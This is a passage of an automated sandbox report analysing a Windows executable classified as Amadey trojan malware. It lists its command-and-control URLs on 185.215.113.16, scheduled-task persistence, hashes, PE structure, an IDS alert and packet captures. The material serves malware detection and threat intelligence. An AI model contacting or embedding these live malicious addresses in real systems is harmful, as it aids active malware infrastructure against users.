                  http://185.215.113.16/Jo89Ku7d/index.phpQiaxplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpsKaxplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpdaxplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.php2haxplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.php3iaxplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.php8axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpBiaxplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpiPaxplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.php#haxplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.php4axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.16
                  unknownPortugal
                  206894WHOLESALECONNECTIONSNLtrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1519603
                  Start date and time:2024-09-26 18:27:05 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 23s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 6436 because there are no executed function
                  • Execution Graph export aborted for target file.exe, PID 3108 because it is empty
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: file.exe
                  TimeTypeDescription
                  12:29:01API Interceptor362974x Sleep call for process: axplong.exe modified
                  18:28:07Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                  • 185.215.113.16/inc/newbundle2.exe
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousPhorpiexBrowse
                  • 185.215.113.66
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  No context
                  No context
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1870848
                  Entropy (8bit):7.950251739270574
                  Encrypted:false
                  SSDEEP:49152:pckGmHJsntsGStzRGwDVgsHY6P+04IYs:pLlWtsf9ZDKs/204Iv
                  MD5:A3A83347AE8FCDEE6EC20F6BA13311C9
                  SHA1:C9DA81CFC77925B9D7039A960ADB5AABD5596128
                  SHA-256:E7B520A3A7D70E9E99B32E44E2604A9A4B05A95964C3EF27054D00564D16EF5B
                  SHA-512:EA4766909DD8314D430B15F097856FD26CF9584C488F8F8F26856FDDDF76C9DA879730CE292BA52CD8BEEDB6F02D3189265CC09CBC6942E5E8F50F692688013C
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`J...........@...........................J..........@.................................W...k............................?J..............................>J..................................................... . ............................@....rsrc...............................@....idata ............................@... . *.........................@...qvaauuzo......0..r..................@...ezuxwngn.....PJ......f..............@....taggant.0...`J.."...j..............@...........................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):304
                  Entropy (8bit):3.43154915595732
                  Encrypted:false
                  SSDEEP:6:PJmXj/XlXUEZ+lX1lOJUPelkDdtE9+AQy0lbKt0:hkj1Q1lOmeeDs9+nVGt0
                  MD5:0F2F6BF08D125224B03F7A5D6B45A2CD
                  SHA1:2CD0797B39EDD82C2DDD98398848CD185DDDB6F1
                  SHA-256:52017765580644A6461E0F32A7DE23CF8CC7C7250713F193ECB1A2242F06405F
                  SHA-512:985C7A30C76590C0845F317FAC18A6D26F6B71EE1E1BC12F6E00057ED6EAFF1B6B7D8BE1261A0B0319C799D515C54F503CF066223583A4E755CE54931F203F73
                  Malicious:false
                  Reputation:low
                  Preview:....Qz.G.=.O...p.3\DF.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.950251739270574
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'870'848 bytes
                  MD5:a3a83347ae8fcdee6ec20f6ba13311c9
                  SHA1:c9da81cfc77925b9d7039a960adb5aabd5596128
                  SHA256:e7b520a3a7d70e9e99b32e44e2604a9a4b05a95964c3ef27054d00564d16ef5b
                  SHA512:ea4766909dd8314d430b15f097856fd26cf9584c488f8f8f26856fdddf76c9da879730ce292ba52cd8beedb6f02d3189265cc09cbc6942e5e8f50f692688013c
                  SSDEEP:49152:pckGmHJsntsGStzRGwDVgsHY6P+04IYs:pLlWtsf9ZDKs/204Iv
                  TLSH:D98533F0369E2C6FD4940037AC708967DD6620474CECEC32F92D6A9A65078A69F7E05F
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0x8a6000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                  Instruction
                  jmp 00007F4FE953555Ah
                  punpckhdq mm3, qword ptr [eax+eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  jmp 00007F4FE9537555h
                  add byte ptr [ecx], al
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax+00h], ah
                  add byte ptr [eax], al
                  xchg eax, esp
                  xchg eax, ecx
                  sldt word ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [ecx], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [edx], ecx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [eax+00000000h], eax
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add eax, 0000000Ah
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a3f000x10qvaauuzo
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x4a3eb00x18qvaauuzo
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x680000x2de00148e3fdcbd2a1d7648fae458dab10c0cFalse0.9973018136920981OpenPGP Public Key7.983537671384169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x690000x1e00x2004d2a8dd332268a2a82a9da1b415616b8False0.576171875data4.540744250156543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x6b0000x2a20000x200310980800030f6b11bd8e5668f78fbefunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  qvaauuzo0x30d0000x1980000x197200817930e6a95668a710af2b4a9cb3a4daFalse0.9943085325836659data7.953327173780446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  ezuxwngn0x4a50000x10000x4002e4f54039fa89d375e28ebc57dffb532False0.7744140625data6.0665248263387745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x4a60000x30000x2200764e826d6024bb57f41f97469222e337False0.06916360294117647DOS executable (COM)0.7403891082527401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_MANIFEST0x4a3f100x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                  DLLImport
                  kernel32.dlllstrcpy
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-26T18:29:19.901497+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649735185.215.113.1680TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 26, 2024 18:29:02.918879032 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:02.923892021 CEST8049720185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:02.923991919 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:02.924305916 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:02.929611921 CEST8049720185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:03.650181055 CEST8049720185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:03.650424957 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:03.652704000 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:03.659868956 CEST8049720185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:03.882004023 CEST8049720185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:03.882442951 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:03.997422934 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:03.997745037 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:04.003460884 CEST8049721185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:04.003539085 CEST8049720185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:04.003676891 CEST4972080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:04.003832102 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:04.003832102 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:04.009155989 CEST8049721185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:04.715169907 CEST8049721185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:04.715581894 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:04.716381073 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:04.721302032 CEST8049721185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:04.944526911 CEST8049721185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:04.944612026 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.059962988 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.060293913 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.065253019 CEST8049722185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:05.065330029 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.065445900 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.065524101 CEST8049721185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:05.065577984 CEST4972180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.070239067 CEST8049722185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:05.784467936 CEST8049722185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:05.784569025 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.785368919 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:05.790206909 CEST8049722185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:06.014287949 CEST8049722185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:06.014364958 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.122502089 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.123060942 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.127980947 CEST8049723185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:06.128093004 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.128329039 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.128376007 CEST8049722185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:06.128447056 CEST4972280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.133073092 CEST8049723185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:06.841623068 CEST8049723185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:06.841707945 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.842906952 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:06.847817898 CEST8049723185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:07.073262930 CEST8049723185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:07.073422909 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.185256004 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.185739040 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.190567017 CEST8049723185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:07.190588951 CEST8049724185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:07.190695047 CEST4972380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.190746069 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.190948963 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.195765972 CEST8049724185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:07.912728071 CEST8049724185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:07.912914991 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.913733959 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:07.918468952 CEST8049724185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:08.141066074 CEST8049724185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:08.141156912 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.247617960 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.248075008 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.252818108 CEST8049724185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:08.252887964 CEST4972480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.253015041 CEST8049725185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:08.253099918 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.253267050 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.258133888 CEST8049725185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:08.942171097 CEST8049725185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:08.942270041 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.943064928 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:08.949929953 CEST8049725185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:09.174534082 CEST8049725185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:09.174622059 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:09.278805971 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:09.279175043 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:09.284126043 CEST8049725185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:09.284224987 CEST8049726185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:09.284255028 CEST4972580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:09.284320116 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:09.284492016 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:09.289424896 CEST8049726185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:10.045361042 CEST8049726185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:10.045486927 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.046216011 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.051206112 CEST8049726185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:10.285099030 CEST8049726185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:10.285191059 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.388051987 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.388364077 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.393261909 CEST8049726185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:10.393341064 CEST4972680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.393593073 CEST8049727185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:10.393671989 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.393815041 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:10.399167061 CEST8049727185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:11.168631077 CEST8049727185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:11.168732882 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.169435024 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.174348116 CEST8049727185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:11.398538113 CEST8049727185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:11.398663998 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.515589952 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.515911102 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.520749092 CEST8049727185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:11.520823956 CEST4972780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.521104097 CEST8049728185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:11.521167994 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.521265984 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:11.526510000 CEST8049728185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:12.247832060 CEST8049728185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:12.248024940 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.248661995 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.254062891 CEST8049728185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:12.495443106 CEST8049728185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:12.495524883 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.606978893 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.607243061 CEST4972980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.616028070 CEST8049729185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:12.616177082 CEST4972980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.616657019 CEST8049728185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:12.616759062 CEST4972880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.617435932 CEST4972980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:12.625428915 CEST8049729185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:13.351587057 CEST8049729185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:13.351757050 CEST4972980192.168.2.6185.215.113.16
